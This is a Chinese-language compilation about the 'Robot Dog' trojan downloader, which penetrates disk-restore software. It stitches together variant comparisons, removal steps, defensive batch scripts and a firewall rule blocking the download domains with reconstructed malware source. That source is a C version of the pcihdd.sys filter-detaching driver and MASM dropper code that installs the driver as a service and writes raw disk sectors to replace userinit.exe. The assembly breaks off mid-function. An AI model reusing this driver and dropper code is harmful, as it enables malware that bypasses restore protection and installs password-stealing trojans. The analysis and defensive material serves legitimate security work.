\explorer.exe"。所以每次重新启动计算机后,被修改覆盖的系统程序"C:\windows\explorer.exe"它都会在被感染计算机的后台连接网络下载骇客事先定义好的下载列表中的全部恶意程序并自动调用运行。那么如果中该病毒的用户比较多,几万台计算机同时启动,骇客的下载服务器会挂掉吗?呵呵~!!
------------------------------------------------------------------------
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
问提:1、这个最新的机器狗变种,是否与你12月19日发的病毒播报中的机器狗变种是同一个病毒?
回答:不是同一个病毒,只是工作原理十分的相似而已。经过仔细分析它们的工作原理和编码风格后,可以推测出新版本"机器狗"病毒和老版本"机器狗"病毒决定不是出自一个人之手。
问提:2、这个最新的机器狗变种是否功能更强大?强大在那儿?与以往机器狗病毒的不同之处在哪?
回答:应该是相对的强大了些。对比"机器狗"一类新、老版本病毒的部分特征如下:
(1):新版本"机器狗"病毒采用VC++ 6.0编写,老版本"机器狗"病毒采用汇编编写。
(2):新版本"机器狗"病毒采用UPX加壳,老版本"机器狗"病毒采用未知壳。
(3):新版本"机器狗"病毒驱动文件很小(1,536 字节),老版本"机器狗"病毒驱动文件很大(6,768 字节)。
(4):新版本"机器狗"病毒安装驱动后没有执行卸载删除操作,老版本"机器狗"病毒安装驱动工作完毕后会卸载删除。
(5):新版本"机器狗"病毒针对的是系统"conime.exe"、"ctfmon.exe"和"explorer.exe"程序文件,老版本"机器狗"病毒只针对系统"userinit.exe"文件。
(6):新版本"机器狗"病毒没有对注册表进行操作,老版本"机器狗"病毒有对注册表"HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Windows
NT\CurrentVersion\Winlogon"项进行操作(感觉该操作没必要,因为重新启动系统后,"还原保护程序"系统会将其还原掉)。
(7):新版本"机器狗"病毒去到系统dllcache文件夹下调用真实系统文件运行,老版本"机器狗"病毒没有到系统dllcache文件夹下调用真实系统文件运行。
(8):新版本"机器狗"病毒采用的是控制台程序图标,老版本"机器狗"病毒采用的是黑色机器小狗图案的图标。
问提:3、机器狗病毒对网吧的影响很大,对个人用户的影响有多少?
回答:个人用户的影响与网吧的影响是同样大的。因为不管计算机系统是否安装"还原保护系统"程序,都会同样下载非常多的(目前是下载27个恶意程序)网络游戏盗号木马等恶意程序进行安装运行,从而给被感染计算机用户带去一定的损失。如果"用户计算机硬件配置比较低"或者"存在所下载的多个恶意程序中出现相互不兼容现象"的话,会导致用户计算机系统崩溃掉无法启动运行。
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
手动杀毒方法:
1:结束掉被病毒修改覆盖后的"C:\windows\explorer.exe"程序进程,删除该程序文件。
2:也许系统会自动还原回来一个正常的"explorer.exe"桌面程序,如果没有还原的话,我们可以手动把"C:\windows\system32\dllcache\"下的"explorer.exe"文件拷贝到"C:\windows\"下。
3:手动卸载掉病毒恶意驱动程序"phy.sys"文件。可以在注册表中找到病毒恶意驱动程序"phy.sys"的启动关联位置然后删除,接着再删除掉"C:
\windows\system32\DRIVERS\phy.sys"文件。 我实际试过N次这种方法,针对该病毒决定好使。
4:重新启动计算机后,一切就都会变为正常了。但是该新版的"机器狗"病毒会下载27个(不固定)恶意程序到被感染计算机中安装运行,这些病毒可以安装江民公司的KV2008去查杀,效果很不错
/*
标 题: 【原创】"机器狗"病毒驱动部分逆向分析注释(C代码)
作 者: dream2fly(QQ:838468959)
时 间: 2008.03.13 于深圳科技园
链 接; http://www.dream2fly.net
版 本: 1.0
【软件名称】: 机器狗(病毒)
【下载地址】: http://www.dream2fly.net 或 自己搜索下载
【加壳方式】: 未知壳
【编写语言】: MASM
【使用工具】: IDA
【操作平台】: win2003
【软件介绍】: 穿透冰点型带驱动病毒
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
*/
#include <ntddk.h> // various NT definitions
#define IOCTL_MYDEV_BASE 0xF000
#define IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01,
METHOD_BUFFERED, FILE_ANY_ACCESS)
#define DR0_DEVICE_NAME "\\Device\\Harddisk0\\DR0"
#define NT_DEVICE_NAME "\\Device\\PhysicalHardDisk0"
#define DOS_DEVICE_NAME "\\DosDevices\\PhysicalHardDisk0"
PDEVICE_OBJECT g_DR0_DeviceObject;
PDEVICE_OBJECT g_OldAttachedDeviceOfDR0;
VOID* g_ResData;
SIZE_T g_ResDataSize;
typedef struct _idtr
{
//定义中断描述符表的限制,长度两字节;
short IDTLimit;
//定义中断描述服表的基址,长度四字节;
unsigned int IDTBase;
}IDTR,*PIDTR;
typedef struct _idtentry
{
//中断执行代码偏移量的底16位;
unsigned short OffsetLow;
//选择器,也就是寄存器;
unsigned short Selector;
//保留位,始终为零;
unsigned char Reserved;
//IDT中的门的类型:包括中断门,陷阱门和任务门;
unsigned char Type:4;
//段标识位;
unsigned char SegmentFlag:1;
//中断门的权限等级,0表示内核级,3表示用户级;
unsigned char DPL:2;
//呈现标志位;
unsigned char Present:1;
//中断执行代码偏移量的高16位;
unsigned short OffsetHigh;
}IDTENTRY,*PIDTENTRY;
#define HOOKINTID_09 9 //NPX Segment Overrun
#define HOOKINTID_0E 0x0E //Page Fault
VOID CheckIdt()//用SIDT指令得到中断向量啊,然后修改中断向量入口地址
{
int INT_09_Address_High8;
int INT_0E_Address_High8;
unsigned long OldISR_09;
unsigned long OldISR_0E;
//保存IDT入口的基地址和限制信息的数据结构;
IDTR idtr;//store interrupt descript table register. to idtr
//记录IDT数组的指针,通过它可以查找到我们需要Hook中断号对应的中断门;
PIDTENTRY IdtEntry;
//汇编指令sidt,获取IDT入口信息;
__asm sidt idtr
//赋予IDT基地址值;
IdtEntry = (PIDTENTRY)idtr.IDTBase;
//保存中断号HOOKINTID对应中断门所指向的执行代码偏移量,以备执行中断处理或恢复时使用
OldISR_09 = ((unsigned int)IdtEntry[HOOKINTID_09].OffsetHigh << 16) |
(IdtEntry[HOOKINTID_09].OffsetLow);
INT_09_Address_High8 = OldISR_09&0x0FF000000;
/*
这两句汇编代码什么意思?eax相减应该总是0,那么 jz不总是跳转返回了???
有知道的大侠告诉我dream2fly(QQ:838468959)
sub eax, eax
jz short FunctionExit
难道是?
if (INT_09_Address_High8 == 0)
return;
*/
//保存中断号HOOKINTID对应中断门所指向的执行代码偏移量,以备执行中断处理或恢复时使用;
OldISR_0E = ((unsigned int)IdtEntry[HOOKINTID_0E].OffsetHigh << 16) |
(IdtEntry[HOOKINTID_0E].OffsetLow);
INT_0E_Address_High8 = OldISR_0E&0x0FF000000;
if (INT_09_Address_High8 != INT_0E_Address_High8)//检查0E是不是被HOOK
{
//关中断
__asm cli
IdtEntry[HOOKINTID_0E].OffsetHigh = 0;// 作者此处没关中断,难道不bosd?
//开中断
__asm sti
}
}
/*
通过搜索地址来查找自己的加载地址
查找驱动文件的资源中的1000/1000,并复制到一个全局缓冲区中
*/
VOID* SearchSelf()
{
VOID* pSelfImage = NULL;
VOID* pCurAddr = NULL;
VOID* pTmpAddr = NULL;
// loc_40045F:这个取当前地址用C怎么写?
//028 lea ebx, loc_40045F
//028 and ebx, 0FFFFFC00h
//pSelfImage如何取?
while(MmIsAddressValid(pSelfImage))
{
if ((unsigned long)pSelfImage <= 0x80000000)
return NULL;
if (RtlEqualMemory(pSelfImage, "MZ", 2))
{
pCurAddr = pSelfImage;
pTmpAddr = (VOID*)((unsigned long)pSelfImage+0x3C);
(unsigned long)pCurAddr += (unsigned long)(&pTmpAddr);
if (!MmIsAddressValid(pCurAddr))
return NULL;
if (RtlEqualMemory(pCurAddr, "PE", 2))
return pSelfImage;
}
(unsigned long)pSelfImage -= 0x400;//-1024K
}
return NULL;
}
SIZE_T ResLookupDataInDirectoryById(void* pSysBaseAddr, int id1, int
id2, CHAR* pResDatas)
{
// 有空再补上:)
return 0;
}
//
// Device driver routine declarations.
//
NTSTATUS
DriverEntry(
IN OUT PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
);
NTSTATUS
CommonDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
);
VOID
Unload(
IN PDRIVER_OBJECT DriverObject
);
NTSTATUS
DriverEntry(
IN OUT PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
CHAR* pResData = NULL;
ANSI_STRING SourceString;
PDEVICE_OBJECT DeviceObject = NULL; // ptr to device object
UNICODE_STRING SymbolicLinkName;
UNICODE_STRING DeviceName;
VOID* pSelfImage;
PDEVICE_OBJECT cur_device_object;
PDEVICE_OBJECT next_device_object;
CheckIdt();
pSelfImage = SearchSelf();
if (pSelfImage == NULL)
return -1;
g_ResDataSize = ResLookupDataInDirectoryById(pSelfImage, 1000, 1000, pResData);
if (g_ResDataSize == 0)
{
return -1;
}
g_ResData = ExAllocatePool(NonPagedPool, g_ResDataSize);
// 跳转到下条指令,延时 jmp short $+2
RtlCopyMemory(g_ResData, pResData, g_ResDataSize);
DriverObject->DriverUnload = Unload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = CommonDispatch;
// 为什么不用RtlInitUnicodeString( &ntUnicodeString, NT_DEVICE_NAME );代替
RtlInitAnsiString(&SourceString, NT_DEVICE_NAME);
RtlAnsiStringToUnicodeString(&DeviceName, &SourceString, TRUE);
RtlInitAnsiString(&SourceString, DOS_DEVICE_NAME);
RtlAnsiStringToUnicodeString(&SymbolicLinkName, &SourceString, TRUE);
ntStatus = IoCreateDevice(
DriverObject, // Our Driver Object
0, // We don't use a device extension
&DeviceName,
FILE_DEVICE_NULL, // Device type
0, // Device characteristics //此处应该用FILE_DEVICE_SECURE_OPEN吧?
FALSE, // Not an exclusive device
&DeviceObject ); // Returned ptr to Device Object
if ( !NT_SUCCESS( ntStatus ) )
{
goto End;
}
ntStatus = IoCreateSymbolicLink( &SymbolicLinkName, &DeviceName );
if ( !NT_SUCCESS( ntStatus ) )
{
cur_device_object = DriverObject->DeviceObject;
while (cur_device_object)
{
next_device_object = DeviceObject->NextDevice;
IoDeleteDevice(cur_device_object);
cur_device_object = next_device_object;
}
}
End:
RtlFreeUnicodeString(&DeviceName);
RtlFreeUnicodeString(&SymbolicLinkName);
return STATUS_SUCCESS;
}
VOID
Unload(
IN PDRIVER_OBJECT DriverObject
)
{
ANSI_STRING SourceString;
PDEVICE_OBJECT DeviceObject = NULL; // ptr to device object
UNICODE_STRING SymbolicLinkName;
PDEVICE_OBJECT cur_device_object;
PDEVICE_OBJECT next_device_object;
if (g_ResData)
{
ExFreePool(g_ResData);
}
if (DriverObject)
{
RtlInitAnsiString(&SourceString, DOS_DEVICE_NAME);
RtlAnsiStringToUnicodeString(&SymbolicLinkName, &SourceString, TRUE);
IoDeleteSymbolicLink(&SymbolicLinkName);
RtlFreeUnicodeString(&SymbolicLinkName);
cur_device_object = DriverObject->DeviceObject;
while (cur_device_object)
{
next_device_object = DeviceObject->NextDevice;
IoDeleteDevice(cur_device_object);
cur_device_object = next_device_object;
}
}
}
NTSTATUS
CommonDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PDEVICE_OBJECT DRO_DeviceObject = NULL; // ptr to device object
PFILE_OBJECT DRO_FileObject;
ANSI_STRING SourceString;
UNICODE_STRING DRO_DeviceName;
PIO_STACK_LOCATION irpSp;// Pointer to current stack location
NTSTATUS ntStatus = STATUS_SUCCESS;// Assume success
ULONG inBufLength; // Input buffer length
ULONG outBufLength; // Output buffer length
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
irpSp = IoGetCurrentIrpStackLocation( Irp );
inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength;
outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
if(!inBufLength || !outBufLength)
{
ntStatus = STATUS_INVALID_PARAMETER;
goto End;
}
switch ( irpSp->MajorFunction )
{
case IRP_MJ_CREATE:
RtlInitAnsiString(&SourceString, DR0_DEVICE_NAME);
RtlAnsiStringToUnicodeString(&DRO_DeviceName, &SourceString, TRUE);
IoGetDeviceObjectPointer(&DRO_DeviceName, 0x80,&DRO_FileObject,
&DRO_DeviceObject);
g_DR0_DeviceObject = DRO_FileObject->DeviceObject;
//保存DR0上的附加设备,然后断开附加,等IRP_MJ_CLOSE时恢复附加
if (DRO_FileObject->DeviceObject->AttachedDevice)
{
g_OldAttachedDeviceOfDR0 = DRO_FileObject->DeviceObject->AttachedDevice;
DRO_FileObject->DeviceObject->AttachedDevice= NULL;
}
ObDereferenceObject(DRO_FileObject);
RtlFreeUnicodeString(&DRO_DeviceName);
break;
case IRP_MJ_CLOSE:
if (g_DR0_DeviceObject)
{
if (g_OldAttachedDeviceOfDR0)
{
g_DR0_DeviceObject->AttachedDevice = g_OldAttachedDeviceOfDR0;
}
}
break;
case IRP_MJ_DEVICE_CONTROL:
if ( irpSp->Parameters.DeviceIoControl.IoControlCode == 0x0F0003C04)
{
if (outBufLength < g_ResDataSize)
goto End;
// 此处就是提取驱动里的资源解码返回给ap层,很简单,不再反汇编了,此处省略
// 唯一不理解的是既然是双缓冲应该用IRP.AssociatedIrp.SystemBuffer返回给ap才是
// 难道此时Irp->AssociatedIrp.SystemBuffer和Irp->UserBuffer地址相同??
RtlCopyMemory(Irp->UserBuffer, g_ResData, g_ResDataSize);
Irp->IoStatus.Information = g_ResDataSize;
}
else
{
ntStatus = STATUS_INVALID_DEVICE_REQUEST;
}
break;
default:
//
// The specified I/O control code is unrecognized by this driver.
//
ntStatus = STATUS_INVALID_DEVICE_REQUEST;
break;
}
End:
//
// Finish the I/O operation by simply completing the packet and returning
// the same status as in the packet itself.
//
Irp->IoStatus.Status = ntStatus;
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return ntStatus;
}
机器狗的生前身后,曾经有很多人说有穿透还原卡、冰点的病毒,但是在各个论坛都没有样本证据,直到2007年8月29日终于有人在社区里贴出了一个样本。这个病毒没有名字,图标是SONY的机器狗阿宝,就像前辈熊猫烧香一样,大家给它起了个名字叫机器狗。
工作原理
机器狗本身会释放出一个pcihdd.sys到drivers目录,pcihdd.sys是一个底层硬盘驱动,提高自己的优先级接替还原卡或冰点的硬盘驱动,然后访问指定的网址,这些网址只要连接就会自动下载大量的病毒与恶意插件。然后修改接管启动管理器,最可怕的是,会通过内部网络传播,一台中招,能引发整个网络的电脑全部自动重启。
重点是,一个病毒,如果以hook方式入侵系统,接替硬盘驱动的方式效率太低了,而且毁坏还原的方式这也不是最好的,还有就是这种技术应用范围非常小,只有还原技术厂商范围内有传播,在这方面国际上也只有中国在用,所以,很可能就是行业内杠。
对于网吧而言,机器狗就是剑指网吧而来,针对所有的还原产品设计,可预见其破坏力很快会超过熊猫烧香。好在现在很多免疫补丁都以出现,发稿之日起,各大杀毒软件都以能查杀。
免疫补丁之争
现在的免疫补丁之数是疫苗形式,以无害的样本复制到drivers下,欺骗病毒以为本身以运行,起到阻止危害的目的。这种形式的问题是,有些用户为了自身安全会在机器上运行一些查毒程序(比如QQ医生之类)。这样疫苗就会被误认为是病毒,又要废很多口舌。
解决之道
最新的解决方案是将system32/drivers目录单独分配给一个用户,而不赋予administror修改的权限。虽然这样能解决,但以后安装驱动就是一件头疼的事了。
来彻底清除该病毒,处理后重启一下电脑就可以了,之前要打上补丁!
或者这样:
1注册表,组策略中禁止运行userinit.exe 进程
2 在启动项目中加入批处理
A : 强制结束userinit.exe进程 Taskkill /f /IM userinit.exe
(其中"/IM"参数后面为进程的图像名,这命令只对XP用户有效)
B : 强制删除userinit.exe文件 DEL /F /A /Q %SystemRoot%\system32\userinit.exe
C : 创建userinit.exe免疫文件到%SystemRoot%\system32\
命令:md %SystemRoot%\system32\userinit.exe >nul 2>nul
或者 md %SystemRoot%\system32\userinit.exe
attrib +s +r +h +a %SystemRoot%\system32\userinit.exe
D : reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\userinit.exe" /v debugger /t reg_sz /d
debugfile.exe /f
userinit1.exe是正常文件改了名字,多加了一个1,你也可以自己修改,不过要手动修改这4个注册表,并导出,这个批处理才能正常使用。
最新动向
好像机器狗的开发以停止了,从样本放出到现在也没有新的版本被发现,这到让我们非常担心,因为虽着研究的深入,现在防御的手段都是针对病毒工作原理的,一但机器狗开始更新,稍加改变工作原理就能大面积逃脱普遍的防御手段,看来机器狗的爆发只是在等待,而不是大家可以高枕了。
目前网上流传一种叫做机器狗的病毒,此病毒采用hook系统的磁盘设备栈来达到穿透目的的,危害极大,可穿透目前技术条件下的任何软件硬件还原!基本无法靠还原抵挡。目前已知的所有还原产品,都无法防止这种病毒的穿透感染和传播。
机器狗是一个木马下载器,感染后会自动从网络上下载木马、病毒,危及用户帐号的安全。
机器狗运行后会释放一个名为PCIHDD.SYS的驱动文件,与原系统中还原软件驱动进行硬盘控制权的争夺,并通过替换userinit.exe文件,实现开机启动。
>> 那么如何识别是否已中毒呢?
是否中了机器狗的关键就在 Userinit.exe 文件,该文件在系统目录的 system32
文件夹中,点击右键查看属性,如果在属性窗口中看不到该文件的版本标签的话,说明已经中了机器狗。如果有版本标签则正常。
临时解决办法:
一是在路由上封IP:
ROS脚本,要的自己加上去
/ ip firewall filter
add chain=forward content=yu.8s7.net action=reject comment="DF6.0"
add chain=forward content=www.tomwg.com action=reject
二是在c:\windows\system32\drivers下建立免疫文件: pcihdd.sys ,
三是把他要修改的文件在做母盘的时候,就加壳并替换。
在%systemroot%\system32\drivers\目录下 建立个 明字 为 pcihdd.sys 的文件夹 设置属性为 任何人禁止
批处理
md %systemroot%\system32\drivers\pcihdd.sys
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n
cacls %systemroot%\system32\userinit.exe /e /p everyone:r
exit
目前,网络流行以下解决方法,或者可以在紧急情况下救急:
1、首先在系统system32下复制个无毒的userinit.exe,文件名为FUCKIGM.exe(文件名可以任意取),这就是下面批处理要指向执行的文件!也就是开机启动userinit.exe的替代品!而原来的userinit.exe保留!其实多复制份的目的只是为了多重保险!可能对防止以后变种起到一定的作用。
2、创建个文件名为userinit.bat的批处理(文件名也可任意取,但要和下面说到的注册表键值保持一致即可),内容如下:
start FUCKIGM.exe (呵呵,够简单吧?)
3、修改注册表键值,将userinit.exe改为userinit.bat。内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.bat,"
就这3步,让这条狗再也凶不起来!这是在windows
2003测试的,双击机器狗后,没什么反应,对比批处理也是正常,即这狗根本没改动它!开关机游戏均无异常!但唯一美中不足的是,采用经典模式开机的启动时会出现个一闪而过的黑框!
如果嫌麻烦,也不要紧。上面三条批处理网友已搞好了,直接复制下面的这个存为批处理执行就OK了。三步合二为一
@echo off
:::直接复制系统system32下的无毒userinit.exe为FUCKIGM.exe
cd /d %SystemRoot%\system32
copy /y userinit.exe FUCKIGM.exe >nul
:::创建userinit.bat
echo @echo off >>userinit.bat
echo start FUCKIGM.exe >>userinit.bat
:::注册表操作
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
/v Userinit / t REG_SZ /d "C:\WINDOWS\system32\userinit.bat," /f >nul
:::删掉自身(提倡环保)
del /f /q %0
当然,如果实在不行,下载程序killigm。然后直接解压运行里面的程序:机器狗免疫补丁.bat 执行就可以了.
网上流传的另一种新的变种的防止方法 :
开始菜单运行.输入CMD
cd ……到drivers
md pcihdd.sys
cd pcihdd.sys
md 1...\
可防止最新变种。请注意:此法只能是防止,对于杀机器狗还得靠最新的杀毒程序才行。
针对该病毒,反病毒专家建议广大用户及时升级杀毒软件病毒库,补齐系统漏洞,上网时确保打开"网页监控"、"邮件监控"功能;禁用系统的自动播放功能,防止病毒从U盘、MP3、移动硬盘等移动存储设备进入到计算机;登录网游账号、网络银行账户时采用软键盘输入账号及密码
代码如下:
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include advapi32.inc
includelib advapi32.lib
includelib user32.lib
includelib kernel32.lib
.data
Text db '对不起,驱动程序的加载没有成功,程序将无法运行.',0
FileName db '\\.\PhysicalHardDisk0',0
a_Physicaldrive db '\\.\PhysicalDrive0',0
aFCJ db '分配内存不成功',0
OutputString db '操作成功', 0
Dst db 10Ch dup(0)
hModule dd 0
ERR1 db '寻址文件不成功',0
ERR2 db '不支持的磁盘分区',0
ERR3 db '第一个分区不是启动分区',0
ERR4 db '该文件是压缩文件,不能操作',0
ERR5 db '获取文件原始信息失败',0
ERR6 db '打开文件失败',0
ERR7 db '加载驱动失败',0
.code
Src db '%SystemRoot%\system32\drivers\pcihdd.sys',0
ServiceName db 'PciHdd',0
;**********************************************************************************************
;退出服务,并删除文件
;**********************************************************************************************
QuitService proc
LOCAL ServiceStatus
LOCAL hSCObject
LOCAL hSCManager
LOCAL @FileName[100h]:byte
push 0F003Fh ; dwDesiredAccess
push 0 ; lpDatabaseName
push 0 ; lpMachineName
call OpenSCManagerA
or eax, eax
jz OpenSCManagerFail
mov hSCManager, eax
push 0F01FFh ; dwDesiredAccess
push offset ServiceName ; "PciHdd"
push hSCManager ; hSCManager
call OpenServiceA
or eax, eax
jz OpenServiceFail
mov hSCObject, eax
lea eax, ServiceStatus
push eax ; lpServiceStatus
push 1 ; dwControl
push hSCObject ; hService
call ControlService
push hSCObject ; hService
call DeleteService
push hSCObject ; hSCObject
call CloseServiceHandle
OpenServiceFail: ; hSCObject
push hSCManager
call CloseServiceHandle
OpenSCManagerFail: ; nSize
push 100h
lea eax, @FileName
push eax ; lpDst
push offset Src ; "%SystemRoot%\\system32\\drivers\\pcihdd.sys"
call ExpandEnvironmentStringsA
lea eax, @FileName
push eax ; lpFileName
call DeleteFileA
ret
QuitService endp
;**********************************************************************************************
;从资源中加载二进制内容写入文件,并将文件写入环境变量,然后启动服务,最后去掉环境变量,删除文件
;**********************************************************************************************
LoadServiceFromRes proc
LOCAL ServiceStatus
LOCAL hSCObject
LOCAL hSCManager
LOCAL nNumberOfBytesToWrite
LOCAL lpBuffer
LOCAL hResInfo
LOCAL @FileName[110h]:byte
LOCAL hObject
LOCAL NumberOfBytesWritten
push 3E9h ; lpType
push 3E9h ; lpName
push hModule ; hModule
call FindResourceA
or eax, eax
jz failed
mov hResInfo, eax
push eax ; hResInfo
push hModule ; hModule
call SizeofResource
mov nNumberOfBytesToWrite, eax
push hResInfo ; hResInfo
push hModule ; hModule
call LoadResource
or eax, eax
jz failed
push eax ; hResData
call LockResource
or eax, eax
jz failed
mov lpBuffer, eax
failed:
or eax, eax
jnz CONTINUE
jmp Exit
CONTINUE: ; nSize
push 100h
lea eax, @FileName
push eax ; lpDst
push offset Src ; "%SystemRoot%\\system32\\drivers\\pcihdd.sys"
call ExpandEnvironmentStringsA
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, @FileName
push eax ; lpFileName
call CreateFileA
cmp eax, 0FFFFFFFFh
jnz short CREATEFILEOK
jmp Exit
CREATEFILEOK:
mov hObject, eax
push 0 ; lpOverlapped
lea eax, NumberOfBytesWritten
push eax ; lpNumberOfBytesWritten
push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
push lpBuffer ; lpBuffer
push hObject ; hFile
call WriteFile
push hObject ; hFile
call SetEndOfFile
push hObject ; hFile
call FlushFileBuffers
push hObject ; hObject
call CloseHandle
push 0F003Fh ; dwDesiredAccess
push 0 ; lpDatabaseName
push 0 ; lpMachineName
call OpenSCManagerA
or eax, eax
jz OpenSCManagerFailed
mov hSCManager, eax
push 0 ; lpPassword
push 0 ; lpServiceStartName
push 0 ; lpDependencies
push 0 ; lpdwTagId
push 0 ; lpLoadOrderGroup
lea eax, @FileName
push eax ; lpBinaryPathName
push 0 ; dwErrorControl
push 3 ; dwStartType
push 1 ; dwServiceType
push 0 ; dwDesiredAccess
push offset ServiceName ; "PciHdd"
push offset ServiceName ; "PciHdd"
push hSCManager ; hSCManager
call CreateServiceA
or eax, eax
jz CreateServiceFailed
mov hSCObject, eax
push hSCObject ; hSCObject
call CloseServiceHandle
jmp OPENSERVICE
CreateServiceFailed:
push 0F01FFh ; dwDesiredAccess
push offset ServiceName ; "PciHdd"
push hSCManager ; hSCManager
call OpenServiceA
or eax, eax
jz short OpenServiceFailed
mov hSCObject, eax
lea eax, ServiceStatus
push eax ; lpServiceStatus
push 1 ; dwControl
push hSCObject ; hService
call ControlService
push hSCObject ; hService
call DeleteService
push hSCObject ; hSCObject
call CloseServiceHandle
OpenServiceFailed:
push 0 ; lpPassword
push 0 ; lpServiceStartName
push 0 ; lpDependencies
push 0 ; lpdwTagId
push 0 ; lpLoadOrderGroup
lea eax, @FileName
push eax ; lpBinaryPathName
push 0 ; dwErrorControl
push 3 ; dwStartType
push 1 ; dwServiceType
push 0 ; dwDesiredAccess
push offset ServiceName ; "PciHdd"
push offset ServiceName ; "PciHdd"
push hSCManager ; hSCManager
call CreateServiceA
or eax, eax
jz QUIT
mov hSCObject, eax
push hSCObject ; hSCObject
call CloseServiceHandle
jmp OPENSERVICE
QUIT:
jmp Exit
OPENSERVICE:
push 10h ; dwDesiredAccess
push offset ServiceName ; "PciHdd"
push hSCManager ; hSCManager
call OpenServiceA
or eax, eax
jz OPENSERVICEFAILED
mov hSCObject, eax
push 0 ; lpServiceArgVectors
push 0 ; dwNumServiceArgs
push hSCObject ; hService
call StartServiceA
or eax, eax
jnz StartServiceOK
jmp Exit
StartServiceOK: ; hSCObject
push hSCObject
call CloseServiceHandle
push hSCManager ; hSCObject
call CloseServiceHandle
jmp OpenSCManagerFailed
OPENSERVICEFAILED:
push hSCManager
call CloseServiceHandle
jmp Exit
OpenSCManagerFailed: ; nSize
push 100h
lea eax, @FileName
push eax ; lpDst
push offset Src ; "%SystemRoot%\\system32\\drivers\\pcihdd.sys"
call ExpandEnvironmentStringsA
lea eax, @FileName
push eax ; lpFileName
call DeleteFileA
ret
Exit:
push 10h
push 0 ; lpCaption
push offset Text ; "出错"
push 0 ; hWnd
call MessageBoxA
push 0 ; uExitCode
call ExitProcess
LoadServiceFromRes endp
aSystemrootSyst db '%SystemRoot%\System32\Userinit.exe',0
;***************************************************************************************************************
;簇是磁盘使用的基本单元。 组成一个簇的扇区数总是2的幂数,当卷被格式化时此数值是固定的。 此数值称为簇要素,
;通常用字节引用,如8KB,2KB。 NTFS通过每件事的逻辑簇数来寻址。
;逻辑簇数(LCN):卷里的每个簇都给定了一个顺序号,这是它的逻辑簇数。LCN0(零)指向卷的第一个簇(引导扇区)。
; 用LCN乘以簇的大小就可以算出在卷里的物理偏移量。
;
;实际簇数(VCN):一个非常驻的流的每个簇都给定了一个顺序号,这是它的实际簇数。VCN0(零)指向这个流的第一个簇。
; 要定位磁盘上的流,就必须把VCN转换成LCN.这是在数据运转的帮助下完成的。
;
;数据运转:每个LCN的连续模块都被赋予了一个数据运转,它包含一个VCN,一个LCN和一个长度。
; 当NTFS需要在磁盘上找到一个对象时,就查看数据运转中的VCN来得到LCN。
;其他信息:
; 1)当卷被格式化时可以选择簇的大小。
; 2)一个卷的簇的大小存储在$Boot里。也定义了此值在一个MFT文件记录和一个索引记录的簇里。
; 3)如果扇区数在用,NTFS通过引用簇数可以寻址更大的磁盘。
;下面是一个关于允许和默认簇的大小的列表:
;Windows NT
; 512 bytes, 1KB, 2KB or 4KB
;Windows 2000, Windows XP
; 512 bytes, 1KB, 2KB, 4KB, 8KB, 16KB, 32KB or 64KB
;卷的大小 默认的簇的大小
;< 512MB Sector size
;< 1GB 1KB
;< 2GB 2KB
;> 2GB 4KB
;***************************************************************************************************************
DoMyWork proc lpFileName ;成功返回值为0
LOCAL lpBuffer
LOCAL nNumberOfBytesToWrite
LOCAL hDevice
LOCAL lDistanceToMove
LOCAL HighOffset
LOCAL dwLowPartofLcn
LOCAL dwHighPartofLcn
LOCAL StartSectorC
LOCAL hFile
LOCAL PhysicalBuff[512]:BYTE
LOCAL Buffer[512]:BYTE
LOCAL OutBuffer[272]:BYTE
LOCAL dwRet
LOCAL DistanceToMoveHigh:DWORD
LOCAL InBuffer[8]:BYTE
LOCAL hObject
pusha
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000000h ; dwDesiredAccess
push offset FileName ; "\\\\.\\PhysicalHardDisk0" 是pcihdd.sys创建的符号链接
call CreateFileA
cmp eax, 0FFFFFFFFh
jz CreateFileFailed
mov hDevice, eax
push 0 ; hTemplateFile
push 20000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push lpFileName ; 打开userinit.exe
call CreateFileA
cmp eax, 0FFFFFFFFh
jz CreateUserInitFileFailed
mov hObject, eax
push 8
lea eax,InBuffer
push eax
call RtlZeroMemory
push 110h ;初始化
lea eax, OutBuffer
push eax
call RtlZeroMemory
push 0 ; lpOverlapped
lea eax, DistanceToMoveHigh
push eax ; lpBytesReturned
push 110h ; nOutBufferSize
lea eax, OutBuffer
push eax ; lpOutBuffer
push 8 ; nInBufferSize
lea eax, InBuffer
push eax ; lpInBuffer
push 90073h ; dwIoControlCode = FSCTL_GET_RETRIEVAL_POINTERS
